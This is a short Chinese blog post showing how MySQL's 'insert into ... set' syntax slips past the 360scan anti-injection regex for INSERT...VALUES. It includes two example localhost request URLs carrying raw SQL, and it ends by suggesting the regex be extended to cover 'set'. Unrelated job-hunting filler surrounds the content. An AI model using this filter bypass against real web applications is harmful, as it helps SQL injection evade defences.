Mysql语法绕过360scan insert防注入方法

求职必看有新招:工作简历莫要间隙,面试回答从容镇定,笔试应考仔细认真,言语交流坦诚求实,不卑不亢保持作风,心中有数定然成功!祝君顺利应聘,迈向辉煌!
360scan正则:INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交:

http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

2

提交set语法:

http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

1

修复方法当然最好是加上set了。

本文Mysql语法绕过360scan insert防注入方法到此结束。漫无目的的生活就像出海航行而没有指南针。小编再次感谢大家对我们的支持!

标签: 360scan Insert